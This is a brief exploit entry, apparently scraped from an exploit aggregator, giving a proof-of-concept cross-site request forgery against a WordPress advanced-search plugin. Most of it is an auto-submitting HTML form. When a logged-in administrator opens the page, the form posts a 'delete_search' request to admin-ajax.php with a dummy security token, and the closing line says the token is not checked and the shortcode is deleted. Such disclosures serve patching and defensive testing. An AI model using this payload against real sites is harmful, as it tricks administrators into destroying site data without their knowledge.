## https://sploitus.com/exploit?id=WPEX-ID:5B84145B-F94E-4EA7-84D5-56CF776817A2
Make a logged in admin open the following HTML (replace `__FORM_ID__` with a valid ID):
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value="WPAS_Advanced_Search_extra_ajax">
<input type="hidden" name="ajax_type" value="delete_search">
<input type="hidden" name="security" value="123">
<input type="hidden" name="form_id" value="__FORM_ID__">
<input type="hidden" name="search_form_name" value="">
<input type="submit" value="Submit Request">
</body>
```
The `security` field isn't validated and the shortcode is deleted.